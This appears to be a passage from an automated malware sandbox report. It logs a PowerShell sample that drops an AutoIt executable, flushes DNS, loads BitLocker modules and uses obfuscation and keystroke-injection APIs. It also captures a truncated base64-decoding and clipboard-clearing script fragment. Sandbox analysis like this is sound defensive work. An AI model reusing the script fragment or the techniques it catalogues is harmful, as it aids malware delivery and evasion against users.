Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: version.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: winmm.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: mpr.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: wininet.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: userenv.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: libeay32.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: ssleay32.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: libssl32.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: netutils.dll Jump to behavior
Source: C:\downloads\Autoit3.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64)));Set-Clipboard -Value " ";exit;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleV
Contains functionality to dynamically determine API calls
Source: C:\downloads\Autoit3.exe Code function: 3_2_0087C6D9 LoadLibraryA,GetProcAddress, 3_2_0087C6D9
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B95BB70 push eax; iretd 0_2_00007FFD9B95BB71
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B950B31 push eax; ret 0_2_00007FFD9B950B51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B95B4F2 push edx; retf 0_2_00007FFD9B95B4F3
Source: C:\downloads\Autoit3.exe Code function: 3_2_0082E93F push edi; ret 3_2_0082E941
Source: C:\downloads\Autoit3.exe Code function: 3_2_00868A4A push FFFFFF8Bh; iretd 3_2_00868A4C
Source: C:\downloads\Autoit3.exe Code function: 3_2_0082EA58 push esi; ret 3_2_0082EA5A
Source: C:\downloads\Autoit3.exe Code function: 3_2_00828B75 push ecx; ret 3_2_00828B88
Source: C:\downloads\Autoit3.exe Code function: 3_2_0082EC33 push esi; ret 3_2_0082EC35
Source: C:\downloads\Autoit3.exe Code function: 3_2_0082ED1C push edi; ret 3_2_0082ED1E
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D393D push 011D3969h; ret 3_2_011D3961
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D4925 push ecx; mov dword ptr [esp], eax 3_2_011D4926
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D715F push 011D71D0h; ret 3_2_011D71C8
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D3975 push 011D3C21h; ret 3_2_011D3C19
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D7161 push 011D71D0h; ret 3_2_011D71C8
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D3815 push 011D3841h; ret 3_2_011D3839
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D7B05 push 011D7B2Bh; ret 3_2_011D7B23
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D3BF5 push 011D3C21h; ret 3_2_011D3C19
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D3595 push 011D35E6h; ret 3_2_011D35DE
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D15F9 push eax; ret 3_2_011D1635
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D37DD push 011D3809h; ret 3_2_011D3801
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D6FE1 push 011D715Dh; ret 3_2_011D7155
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CE4360 push 03CE4389h; ret 3_2_03CE4381
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D182B8 push 03D182E4h; ret 3_2_03D182DC
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CE62B0 push 03CE62DCh; ret 3_2_03CE62D4
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CD424C push 03CD4278h; ret 3_2_03CD4270
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CDA26C push 03CDA298h; ret 3_2_03CDA290
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CDA150 push 03CDA17Ch; ret 3_2_03CDA174
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CD4174 push 03CD41C1h; ret 3_2_03CD41B9
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CD4173 push 03CD41C1h; ret 3_2_03CD41B9
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CEA104 push 03CEA130h; ret 3_2_03CEA128
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D180E0 push 03D1810Ch; ret 3_2_03D18104

Persistence and Installation Behavior
barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\downloads\Autoit3.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\downloads\Autoit3.exe Code function: 3_2_008859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 3_2_008859B3
Source: C:\downloads\Autoit3.exe Code function: 3_2_00815EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 3_2_00815EDA
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\downloads\Autoit3.exe Code function: 3_2_008233B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_008233B7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
